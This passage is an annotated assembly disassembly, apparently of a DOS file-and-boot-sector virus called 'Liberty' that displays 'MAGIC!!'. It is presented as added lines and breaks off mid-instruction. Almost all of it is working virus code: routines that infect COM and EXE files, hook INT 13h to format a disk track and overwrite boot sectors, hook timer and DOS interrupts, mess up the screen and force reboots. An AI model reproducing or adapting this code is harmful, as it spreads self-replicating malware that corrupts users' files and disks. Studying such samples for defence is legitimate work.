+CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? +CS:03BC 7505 JNZ 03C3 +CS:03BE E8C001 CALL 0581 ; Adapt header +CS:03C1 EBB2 JMP 0375 +CS:03C3 2E CS: +CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch +CS:03C9 E8CD00 CALL 0499 ; Check infection +CS:03CC 74A7 JZ 0375 +CS:03CE E8DD00 CALL 04AE ; Encrypt header +CS:03D1 E8EB00 CALL 04BF ; Move to EOF +CS:03D4 729F JB 0375 +CS:03D6 83FA00 CMP DX,+00 ; +CS:03D9 759A JNZ 0375 ; +CS:03DB 3D0005 CMP AX,0500 ; +CS:03DE 7295 JB 0375 ; +CS:03E0 3DFFEF CMP AX,EFFF ; +CS:03E3 7390 JNB 0375 ; Check file size +CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph +CS:03E8 728B JB 0375 +CS:03EA E80701 CALL 04F4 ; Write virus +CS:03ED 7286 JB 0375 +CS:03EF 3BC1 CMP AX,CX +CS:03F1 7C11 JL 0404 +CS:03F3 E81301 CALL 0509 ; Move to BOF +CS:03F6 7209 JB 0401 +CS:03F8 E86201 CALL 055D ; Decrypt Libery header +CS:03FB E81E01 CALL 051C ; Write Liberty header +CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header +CS:0401 E971FF JMP 0375 +CS:0404 E83801 CALL 053F ; Set & get vector 13h +CS:0407 E96BFF JMP 0375 +; +; Revectoring of error vectors. +; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 +CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? +CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? +CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? +CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE 